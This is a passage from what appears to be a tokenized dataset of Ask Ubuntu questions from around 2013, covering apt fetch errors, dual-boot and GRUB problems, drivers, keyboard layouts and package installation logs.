91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-test amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main qt4-qmake amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-dev amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-opengl-dev amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-sql-mysql amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libqt4-sql-sqlite amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main qt4-designer amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main qt4-dev-tools amd64 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main qt4-doc all 4:4.7.2-0ubuntu6.4 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-common_5.1.63-0ubuntu0.11.04.1_all.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient16_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/p/phonon/libphonon4_4.7.0really4.5.0-0ubuntu3_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-script_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-sql_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-xmlpatterns_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-declarative_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-designer_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-qt3support_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-svg_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-scripttools_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-help_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-test_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/qt4-qmake_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-dev_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-opengl-dev_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-sql-mysql_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/libqt4-sql-sqlite_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/p/phonon-backend-gstreamer/phonon-backend-gstreamer_4.7.0really4.5.0-0ubuntu2.1_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/p/phonon/phonon_4.7.0really4.5.0-0ubuntu3_all.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/q/qtwebkit-source/libqtwebkit4_2.1~really2.0.2-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/q/qtwebkit-source/libqtwebkit-dev_2.1~really2.0.2-0ubuntu1_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/qt4-designer_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/qt4-dev-tools_4.7.2-0ubuntu6.4_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/q/qt4-x11/qt4-doc_4.7.2-0ubuntu6.4_all.deb 404 not found [ ip : 91.189.91.13 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? gns no response sudo wget http : //sourceforge.net/projects/gns-3/files/gns3/0.8.2/gns3-0.8.2-src.tar.gz/download -- 2013-10-05 10:54:14 -- http : //sourceforge.net/projects/gns-3/files/gns3/0.8.2/gns3-0.8.2-src.tar.gz/download resolving sourceforge.net ... 216.34.181.60 connecting to sourceforge.net|216.34.181.60|:80 ... connected . http request sent , awaiting response ... 302 found location : http : //downloads.sourceforge.net/project/gns-3/gns3/0.8.2/gns3-0.8.2-src.tar.gz ? r= & ts=1380941654 & use_mirror=nchc [ following ] -- 2013-10-05 10:54:15 -- http : //downloads.sourceforge.net/project/gns-3/gns3/0.8.2/gns3-0.8.2-src.tar.gz ? r= & ts=1380941654 & use_mirror=nchc resolving downloads.sourceforge.net ... 216.34.181.59 connecting to downloads.sourceforge.net|216.34.181.59|:80 ... connected . http request sent , awaiting response ... 302 found location : http : //nchc.dl.sourceforge.net/project/gns-3/gns3/0.8.2/gns3-0.8.2-src.tar.gz [ following ] -- 2013-10-05 10:54:15 -- http : //nchc.dl.sourceforge.net/project/gns-3/gns3/0.8.2/gns3-0.8.2-src.tar.gz resolving nchc.dl.sourceforge.net ... 211.79.60.17 , 2001 : e10 : ffff:1f02 : :17 connecting to nchc.dl.sourceforge.net|211.79.60.17|:80 ... connected . http request sent , awaiting response ...
353892	retrieve data put into non-directory file by using -mv command	i used the command below to move my data to a directory : find . -name '*.mat ' -exec mv { } ./ooutputs \ ; however the directory of ./ooutputs does not exist . a file named ootputs is then created which i can not open . is there anyway to retrieve the data inside the file ? many thanks . wenxu
353893	how to load xmir on ubuntu 13.10	i want to try xmir on ubuntu 13.10 but the results of command cat /var/log/xorg.0.log | grep -i mir showing a warning ( ww ) `` xmir '' is not to be loaded by default . skipping . terminal output - sample image : what i have to do in order to test xmir in ubuntu 13.10 ?
353894	bad translation package when using apt-get install	i 've recently install a copy of ubuntu 13.10 from a usb drive , and a lot of things are going wrong . my first indicator of this was that ubuntu software center crashes every time i try to load it . i 've tried multiple workarounds , but pretty much all of them involve running some variant of apt-get install from terminal . whenever i do this , i get a message like this : reading package lists ... error ! e : unable to parse package file /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_ dists_saucy_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_saucy-u pdates_main_binary-i386_packages e : the package or status file could not be parsed or opened . i opened both of the file mentioned , and they both looked fine to me . the first part seems to have something to do with languages , but language center also crashes when i try to open it . does anybody have any suggestions ?
353895	why ca n't i see my usb thumb drive and other memory devices ?	i am new to linux ubuntu os . i have 12.04 64 bit installed on my acer aspire 5100 . my usb ports do work , i have wireless mouse an keyboard so i know they work but when i mount my external hard drive or thumb drives it wo n't see those . i have done exactly what was posted here and still nothing has changed . what am i doing wrong ? can some one help with this situation i am in ? thanks slim
353897	category menu of netbeans do not load ?	when i was going to start a new project , a dialog box came , but the categories did not load.how to fix this issue ? i am using ubuntu 12.04 64-bits netbeans 7.0.1
353901	what makes a computer compatible with linux ( ubuntu ) or not ?	i 'm a long time ubuntu user , and i 'm now considering about buying a new laptop only for ubuntu . but i arrived at serious question , and i 'm really curious about what makes some computer compatible to ubuntu or not . for example , my latest samsung laptop was terrible with ubuntu , like , , , i can not adjust the brightness and screen blinkering every time , and i thought it 's because samsung has modified their bios for windows . but not sure . so , my question is , is there a some kind of standard in computer industry so that computers manufactured not concerning about this standard does n't work with ubuntu ? or each computer components ( like wireless adapter , bios , chipset etc . ) decides will the computer compatible with ubuntu ? i 'm asking you this because i know i could find if some laptop compatible in ubuntu certified or ubuntu friendly etc. , but if i could determine some laptops not in this list will also cause no problem with ubuntu ( now and in future releases ) . ( and i do n't want shopping recommendations ; ) ) thank you very much ! : )
353904	how to synchronize facebook calendar , events and google calendar in ubuntu 13.04 ?	how to synchronize facebook events , birthdays and google calendar in ubuntu . is there any well recognized application that can sync these things and display notifications on desktop . please help
353906	reducing the size of udev filesystem	i have this line in the output of df -h : udev 16g 4.0k 16g 1 % /dev what is this thing doing ? do i need it , and if not , how can i reduce the size of it ? as far as i know , this never existed at least in lucid .
353907	best way to add replay gain to m4a files ?	i use ( and love ) quodlibet as a my music player and it has a plugin that calculates replay gain values ( album and track ) and stores them in the files . however , it does n't work for my m4a files ... just my mp3 and flac . any suggestions for a tool that will do this on ubuntu 12.04+
353908	update manager problem [ requires installation of untrusted packages ]	`` requires installation of untrusted packages '' '' the action would require the installation of packages from not authenticated sources '' update manager is showing this message and i am not able to install any updates . what should i do ?
353910	theme shows improperly after last update from update manager	i installed the last updates from update manager some hours ago ( i ca n't remember what kind of updates they were ) and now the delorean dark theme 3.9 show improperly in some windows or software , for example in banshee it does n't show the dark color , it is with the default color from unity instead ; the window where you select the file name and the folder when saving a download , has the same situation . in addition , when i try to run gksudo nautilus in the terminal i get this messages that i think are related with the problem : ( gksudo:4344 ) : gtk-warning ** : unable to locate theme engine in module_path : `` adwaita '' , /usr/share/themes/delorean-dark-theme-3.9/gtk-2.0/gtkrc:1797 : error : unexpected identifier direction ' , expected character } ' ( gksudo:4344 ) : gtk-warning ** : theme directory of theme azenis has no size field i think the updates have changed something about codes , and now the code in which the theme is written is different from the new one .
353911	hitting arrow keys adds characters in vi editor	when i tried to use arrow keys in insert mode in vi editor the following characters are being inserted in the editor : for ↓ i get b , for ↑ i get a , for ← i get d , for → i get c. please help me in resolve this problem .
353912	can you upgrade the new wubi installation to 13.04	so , i want to have ubuntu , but my computer takes like 6 hours just to make one change to the partitions . i have tried changing hard drives , but no luck . i ca n't afford a ssd . if you have any tips for partitioning those would be greatly appreciated also . i 've tried this before . i 've used ubuntu for a while and have self taught myself to use command line and prefer it to most gui applications . my solution would be to use the wubi installer instead of the live cd to install ubuntu . if this helps , currently i am using ubuntu , but want to dual boot with 32 bit windows 7 or 8 . for clarification , i want to install ubuntu via windows wubi installer ( new one that says it only supports 12.04.3 ) and then upgrade that installation using `` update-manager -d '' to upgrade to 13.04 . dell d620 core 2 duo @ 1.8ghz 1.5gb ram intel graphics
353913	fax / ubuntu interface	is there a way to have access from ubuntu 12.04 ( libreoffice writer or other ) to an epson stylus nx305 fax ? the fax machine has a pstn ( public switched telephone network ) port and a usb ( universal serial bus ) port and works well as a stand alone fax ( facsimile ) using the pstn port for both incoming and outgoing fax . i would like to be able to send fax requests directly from the computer so i do not need to take the extra steps to print and scan the outgoing fax . it would also be nice to divert incoming fax so they need not be scanned to save the fax on the computer . print and scan work well , but it would be nice to save ink in printing the fax . most of the companies with which i deal have fax which makes it a more secure option than email and a lot faster than a courier service like usps ( united states postal service ) , ups ( united parcel service ) , fedex ( federal express ) , etc .
353914	copy & paste between terminal ( s ) and application windows in i3	i have recently installed the i3 tiling window manager [ 1 ] on my ubuntu system and i 'm trying to figure out how to copy & paste between various terminal and application windows . how can this be done ? [ 1 ] http : //i3wm.org
353915	how to access other video inputs via easycap 4 channel ?	i have easycap 4 channel usb capture device with four cameras connected to it . i can view and capture video from the first input via /dev/video0 , but there is no video1 , video2 , etc . how do i switch to other inputs without physically reconnecting cameras ? bus 001 device 005 : id 05e1:0408 syntek semiconductor co. , ltd stk1160 video capture device
353916	unable to remove kde plasma workspace login	i installed ubuntu 12.0.4 recently and then on top of it tried installing kde plasma workspace . i now want to get rid of kde plasma workspace and have ran all commands available on forum and most stuff is gone but the login screen still has the option to login to kde plasma workspace . how can i get rid of login option to kde plasma workspace ?
353917	hidden startup applications	i do n't use things like ubuntu one . how do i disable it from startup applications ? i believe it is hidden by default along with some other apps .
353921	error 503 - varnish cache server	note : this website wo n't let me post images or more than 2 links due to lack of points . the complete message is available with all the screenshots and all the links here . i 'm on windows 7 , and i have installed the latest stable version of ubuntu server inside a virtualbox virtual machine . hence , windows 7 is the host , and ubuntu server is the guest computer . i have followed the instructions for the quick installation of plumi ( a mod of plone ) ( link to instructions available in full message link ) . i thus have the following 7 services running : cache nginx ploneftp transcodedaemon uwsgi worker zeo because this is ubuntu server , i have no way to see localhost from within the guest ( because i only have terminal access to ubuntu server from outside ) , or at least that 's how it seems . therefore , to see the guest 's localhost , i 'm trying to access localhost from a browser on my host . i configured virtualbox > network settings to nat as below ... screenshot available in full message link . ... and added port-forwarding as below ... screenshot available in full message link . ... next , when i went to localhost on my host computer , i got this ... screenshot available in full message link . ... next , i tried the bridged adapter setting in virtualbox > network settings , screenshot available in full message link . ..and when i went to localhost on my host computer , i still got the same error 503 message apparently this is a very common error reported on the internet . a common proposed solution was to `` clear the varnish cache '' . one of the proposed solutions on the internet is to run the following command line instruction varnishadm -t 127.0.0.1:6082 url.purge . i tried running this instruction at various places along the directory tree , even in the directory where i can clearly see something called `` varnishadm '' , but i keep getting the following error message : the program 'varnishadm ' is currently not installed . you can install it by typing : sudo apt-get install varnish i am attaching the following log files from doing `` tail -f var/log/* '' are available in full message link . site.cfg file is available in full message link . any help would be highly appreciated . note : this website wo n't let me post images or more than 2 links due to lack of points . the complete message is available with all the screenshots here .
353922	what to know about turning ps3 into ubuntu desktop	i have ps3 slim that i dont use so much any more and i was thinking i would like a desktop maybe i can recycle and use this : d has anyone have experience running ubuntu on ps3 as a full time desktop ? can i still run apps to do some light web developing ? if someone can point me to some benchmark performance that would be very nice of you ! thank you : )
353924	what is new in ubuntu 13.10 & migration criteria	since the emergence of ubuntu 12.04 , the experts recommended it . even after 2 versions ( 12.10 ; 13.04 ) , this recommendation remains valid.my questions are : how can you compare the two versions ( 12.04 & 13.10 ) to know if it is right to migrate to 13.10 . if we find that the latest version is stable , this criterion may be sufficient for ubuntu 13.10 migration . what are the new features of ubuntu 13.10
353926	during install , not partitioning correctly	i 'm trying to install the latest 64-bit build of ubuntu ( 13.04 ) . unfortunately , during install ubuntu ca n't seem to partition my drive correctly . my primary drive is a 128gb ssd . i want it dual booting with windows 7 . with windows 7 , i resized my primary ntfs windows partition to create 20gb of free space . when i select that free space for ubuntu to install on , i receive the following warning : some of the partitions you created are too small . please make the following partitions at least this large : /2.9 gb if you do not go back to the partitioner and increase the size of these partitions the installation may fail . however , i do not know which partition it 's asking me to resize . any suggestions on how to fix this ?
353930	hp dv4 1230br : wireless not working	i have a above mentioned laptop . the wireless is not working . what do i have to do to use ubuntu and make it work ? thanks
353932	equivalent of .url file on ubuntu	an url link has been saved in *.url file via windows and when you open this file . if you double click on the newly created internet shortcut , a simple url file , it will open your default browser to the indicated url . example f url file cntent : [ internetshortcut ] url=http : abdennour-insat.blogspot.com when the same file ( .url ) is copied on ubuntu os , ubuntu handles it such as a text file . hence , browser does not openend when trigging double click on file my question is : what is the equivalent of .url file in linux to make shortcut file for urls ?
353937	windows 7 computer wo n't boot after ubuntu dualboot installation	i have a windows 7 32-bit laptop on which i installed ubuntu alongside win7 . at first the problem was that it would boot directly into windows without a boot menu as if ubuntu did n't exist . i successfully used boot repair to get a boot menu and everything seemed fine . the next day i restarted the computer and now the computer wo n't boot at all . when the system is trying to boot i get the following : pxe-e61 : media test failure , check cable pxe-m0f : exiting pxe rom operating system not found the only way i can start the computer is by inserting the usb flash drive with ubuntu bootable files on it which lets me use ubuntu but not install it . this is the flash drive i originally used to try ubuntu and then install it . using the boot repair a second time did n't help . the system does n't recognize my hard drive at all . i tried using the recovery function of my windows 7 dvd which gave me a `` the partition table does not have a valid system partition '' error . windows cd also does n't recognize a hard drive or an operating system on my system . i have been browsing the forums but most other people with similar problems seem to have some sort of access to their hard drive but i have n't found a way yet . can anyone help please ?
353939	installing ubuntu 12.04 cloud on external pen drive ?	i just want to create my private cloud . i had installed it on my pc . but right now i want to install it on my pen drive which 16gb .
353942	why does my ubuntu installer crash as soon as i say install by windows 7	every time i try to install it lets me pick the preparing instalation window , but as soon as i say install alongside windows the installer crashes and then tells me to remove the disk and press enter
353943	can not boot into windows after installing ubuntu	i can boot into ubuntu 13.04 without problems , but if i select windows 8 in the boot menu i get this error : file'boot grub i386-pc normal mod not found i used boot-repair but it did not work . ( i ran the boot-repair in the ubuntu from the hdd , not the live dvd . ) what should i do ?
353946	post installation error , device is not root	i am new to ubuntu . i have installed ubuntu 12.4 on a vdi in my system . during installation i had given 30 gb hard disk for ubuntu . now every time i reboot the vdi , i see the hard disk ( device ) , it does not boot as the 30 gb as root . i need to boot that 30 gb as root . can any one please help me ? ?
353947	difficulty when installing gns3	do not understand at step 5 step 5 : . go to edit | preferences and in the ‘terminal command : ’ section type in : gnome-terminal -t % d -e ‘telnet % h % p’ > /dev/null 2 > & 1 & step 6 . under ‘paths’ change the ‘project directory : ’ to /opt/gns3/project and the ‘ios/pix/asa directory : ’ to /opt/gns3/ios where is edit | preference , is it gnome-terminal ? where is the path ? http : //forum.gns3.net/topic4690.html
353949	music app missing from ubuntu touch	i recently installed the ubuntu touch build dated 3rd oct on my phone . after that , i used adb shell and did : apt-get update apt-get upgrade apt-get dist-upgrade . then i rebooted my phone , and ever since , the music app is no where to be found . when i tried to run the music app from shell i got : '' qmlscene : could not find a qt installation of '' `` . on running qtchooser -- list-versions : qt5-arm-linux-gnueabihf 5 qt5 please help !
353953	command sudo halt do n't run : speed dispatcher disabled edit /etc/default /speed dispatcher	when i do sudo halt the computer shutdown but a black screen appear : where it was written lots of lines whose line speed dispatcher edit /etc/defaut/speed-dispatcher
353954	problem with vmlinuz.efi ubuntu 12.04 lts	i am tying to install ubuntu 12.04 along with windows on my pc . when i copy wubi in the folder where my iso file is and start it after some time it gave an error cann not install see log file . in the log file the time when it found my iso and was checking in the next line it gave an error can not find casper/vmlumiz.efi . when checked iso file it contained that file but there was no extension '.efi ' so i extracted it and added that extension and then made it an iso file but the new file 's md5 sum was wrong . can anybody help i am using nero 10 oem to make iso .
353956	install ubuntu on a panasonic toughbook cf-28 that does n't boot from usb or cd	i am new to ubuntu . i am trying to install on a panasonic toughbook cf-28 . it 's quite old but runs ok ( slow by today 's standards ) , but i just use it to run some navigation software on my boat . it has a usb port but no cd drive and the bios will not let me boot from the usb port . i have tried copying ubuntu 12.04 to the hard drive , but when attempting to open i get a windows message asking which program i want to open with . i have tried downloading the windows installer but it also wo n't open . the computer is running windows xp professional . any suggestions would be appreciated .
353960	share the wire connection with network manager	i 've created a wired connection with network manager . the direct connection is linked to a switch , my system and another system are also linked to the switch as well . however , the other machine does not have any connection and wants to get internet connection from my machine . what crossed my mind was to set a shared connection in network manager . but , when i choose `` shared to other computers '' , other options like dns search , ip address , netmask and gateway get disabled . is there any way to accomplish what i have in mind ?
353963	how do i get jack to work ?	jack can not connect to the server when i use ubuntu 13.04 on my laptop . i have no problems using jack on my tower that runs ubuntu 12 , i use it for rakarrak and audacity . when i mess with the settings i can get jack to start sometimes , but never can get rakarrak to recognize my instruments/mics . : / : / i have pulse downloaded aswell . hellllppppp : oooo
353966	unity disappear after autoremove	first of all : i have ubuntu 12.04 , my nvidia driver does n't properly works with my gforce 310m , and i have no advance knowledge in linux . i was trying to reinstall python ... so as a first step i write in the terminal : sudo apt-get autoremove python it toke a while to finish . and suddenly when it finished my unity disappear , so my application launcher and the graphics were pretty lame . i restart ubuntu but things were pretty much the same . now i can only : 1 ) launch nautilius ( the file manager ) through f3 2 ) launch chrome through nautilius 3 ) i can access to any file with nautilius . i do n't know how to open a terminal windows . i had tried ctr+alt+t but does n't work . i had tried to start with an old ubuntu version but can not log in . i ca n't start tty1 with ctl+alt+f1 because the screen just turns off ( there is no prompt ) . i ca n't even change windows with alt+tab i had opened the terminal when i open .sh files through nautilius , but the terminal open and close really quickly so , my question are : 1 ) how do i fix this mess ? 2 ) how can i open a terminal window from nautilius ? 3 ) after i manage to open a terminal windows is it ok to command unity -- reset ? i hope you can help me . thanks in advance ! jorge m
353973	want dual boot ubuntu and windows 8 ( preinstalled )	i am trying to install ubuntu on my preinstalled windows 8 laptop . after installing it using wubi , and then selecting ubuntu from dual boot option , it gives black screen with error message , file- ubuntu\winboot\wubildr.mbr status- 0xc000007b info- application or operating system couldnt be loaded because the required file missing .
353977	how to enable just second screen only ?	for some reason i need to use only second screen . i have attached laptop with lcd monitor but now both screens are on while i just need one , i cant figure it out i have looked for it but did n't find a thing about it . help !
353981	sometimes when i boot up my toshiba satellite l875d lap top running ubuntu 12.04 lts it does not detect my keyboard	i have the follow issue . i am using ubuntu 12.04 lts on toshiba satellite l875d and sometimes when i boot up my machine it reaches the log in session where i am supposed to type my password but my keyboard does not work . so i am forced to restart my lap top using my mouse and then i face the same problem again right after the first restart at least once or twice until i am finally able to use my keyboard . the weirdest part is that when i restart my lap top to try to make my keyboard working ubuntu does n't boot up and it just stays on a black screen without doing anything so i have to use my turn off button to restart it , after that everything is fine . this trouble occurs from time to time but it is still very annoying i have googled my trouble issue trying to find similar topics or someone who has experienced the same problem but i could n't . i will greatly appreciate any help from you guys . thank you in advance .
353982	how do i activate the wwan connection on dell inspiron 910 netbook ?	i have a netbook with built-in sim card slot ( dell inspiron 910 ) and ubuntu 12.04 . now i got me a prepaid sim to go online during vacations . i had a look at http : //wiki.ubuntuusers.de/rfkill and tried several things . first of all , rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmul-0 : wireless lan soft blocked : no hard blocked : no 2 : compal-wifi : wireless lan soft blocked : no hard blocked : no 3 : compal-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hcio : bluetooth soft blocked : no hard blocked : no apparently , there is no wireless wan . i can imagine i should block all unused devices . lsmod | egrep '_acpi|_bluetooth|intel_oaktrail|_laptop|_rfkill|_wmi' gives me : dell_laptop 17767 0 compal_laptop 19315 0 dcdbas 14098 1 dell_laptop ( whatever that means ; according to modinfo dell_laptop , dell_laptop depends on dcdbas ) . finally , there must be a serious problem , because dmesg | egrep 'radio|kill|switch' gives me a line : [ 17.743882 ] dell_laptop : blacklisted hardware detected - not enabling rfkill how can i find out more about my `` blacklisted hardware '' and how to activate it ?
353983	unable to boot windows 8 x64 from grub	i am using ubuntu 13.04 . and want to have windows 8 pro on a separate partition of 150 gb along side ubuntu . i did the same and installed windows 8 pro x64bit uefi but when i try to repair grub to get ubuntu & windows 8 both in same page , ubuntu is able to boot from there but windows 8 is not . windows 8 is just showing loading windows files and system reboot itself . please help , i tried multiple time re-installing windows 8 and grub but still no luck .
353984	no gui after update	i updated my system recently , and , after i restarted , i got no ui at all . i still get the background image , the pointer , the logon screen works fine , but there is no gray bar and no dock . i figured it might be because of my video card ( amd radeon hd 6570 ) so i uninstalled my current driver ( the one from the amd website ) and i tried the 2 fglrx drivers from the drivers section in settings . still did n't work . i even tried the beta drivers from the amd website . nope . can you help me ?
353987	remove ubuntu one	i do n't use ubuntu one much . how do i remove it ? i 've already removed it from startup applications as given here : hidden startup applications
353991	how do i install drivers for sis 671/771 in ubuntu 13.04 ?	i need some help getting and installing drivers for my integrated graphic card . i own an esprimo mobile 5535 and i want to be able to use a proper resolution at least if not some graphics acceleration . i found some topics but they seem to apply only for 10.04 version . please give me a hand.. thank you . edit : i upgraded now to 13.10
353994	advanced keyboard layout options	i 'm using english , russian and armenian keyboard layouts . when i 'm trying to change layout it 's changing `` en '' - > `` am '' - > `` ru '' - > `` en '' ... i want to use left alt + shift to toggle `` en '' and `` am '' , and right alt + shift to toggle `` en '' and '' ru '' . can you help me ?
353996	cant match up macbook pro keyboard in ubuntu	a few of the keys do not match up when used in ubuntu , | 'pipe ' is one of them .
353998	error while installing crossplatformui : post-installation script failed	the installation or removal of a software package failed . installarchives ( ) failed : selecting previously unselected package binfmt-support . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 303468 files and directories currently installed . ) unpacking binfmt-support ( from ... /binfmt-support_2.0.13_i386.deb ) ... selecting previously unselected package cli-common . unpacking cli-common ( from ... /cli-common_0.8.2_all.deb ) ... selecting previously unselected package libmono-system-xml4.0-cil . unpacking libmono-system-xml4.0-cil ( from ... /libmono-system-xml4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-system-security4.0-cil . unpacking libmono-system-security4.0-cil ( from ... /libmono-system-security4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-system-configuration4.0-cil . unpacking libmono-system-configuration4.0-cil ( from ... /libmono-system-configuration4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-system4.0-cil . unpacking libmono-system4.0-cil ( from ... /libmono-system4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-security4.0-cil . unpacking libmono-security4.0-cil ( from ... /libmono-security4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package mono-4.0-gac . unpacking mono-4.0-gac ( from ... /mono-4.0-gac_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package mono-gac . unpacking mono-gac ( from ... /mono-gac_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package mono-runtime . unpacking mono-runtime ( from ... /mono-runtime_2.10.8.1-5ubuntu1_i386.deb ) ... selecting previously unselected package libmono-corlib4.0-cil . unpacking libmono-corlib4.0-cil ( from ... /libmono-corlib4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libglib2.0-cil . unpacking libglib2.0-cil ( from ... /libglib2.0-cil_2.12.10-5_i386.deb ) ... selecting previously unselected package libmono-cairo4.0-cil . unpacking libmono-cairo4.0-cil ( from ... /libmono-cairo4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libgdiplus . unpacking libgdiplus ( from ... /libgdiplus_2.10-3ubuntu1_i386.deb ) ... selecting previously unselected package libmono-system-drawing4.0-cil . unpacking libmono-system-drawing4.0-cil ( from ... /libmono-system-drawing4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libgtk2.0-cil . unpacking libgtk2.0-cil ( from ... /libgtk2.0-cil_2.12.10-5_i386.deb ) ... selecting previously unselected package libappindicator0.1-cil . unpacking libappindicator0.1-cil ( from ... /libappindicator0.1-cil_12.10.1daily13.04.15-0ubuntu1_all.deb ) ... selecting previously unselected package libmono-posix4.0-cil . unpacking libmono-posix4.0-cil ( from ... /libmono-posix4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-system-core4.0-cil . unpacking libmono-system-core4.0-cil ( from ... /libmono-system-core4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libdbus1.0-cil . unpacking libdbus1.0-cil ( from ... /libdbus1.0-cil_0.7.0-5_all.deb ) ... selecting previously unselected package libdbus-glib1.0-cil . unpacking libdbus-glib1.0-cil ( from ... /libdbus-glib1.0-cil_0.5.0-4_all.deb ) ... selecting previously unselected package libgconf2.0-cil . unpacking libgconf2.0-cil ( from ... /libgconf2.0-cil_2.24.2-2_all.deb ) ... selecting previously unselected package libgmime2.6-cil . unpacking libgmime2.6-cil ( from ... /libgmime2.6-cil_2.6.13-0ubuntu1_all.deb ) ... selecting previously unselected package libgtkspell0 . unpacking libgtkspell0 ( from ... /libgtkspell0_2.0.16-1ubuntu6_i386.deb ) ... selecting previously unselected package libmono-sharpzip4.84-cil . unpacking libmono-sharpzip4.84-cil ( from ... /libmono-sharpzip4.84-cil_2.10.8.1-5ubuntu1_all.deb ) 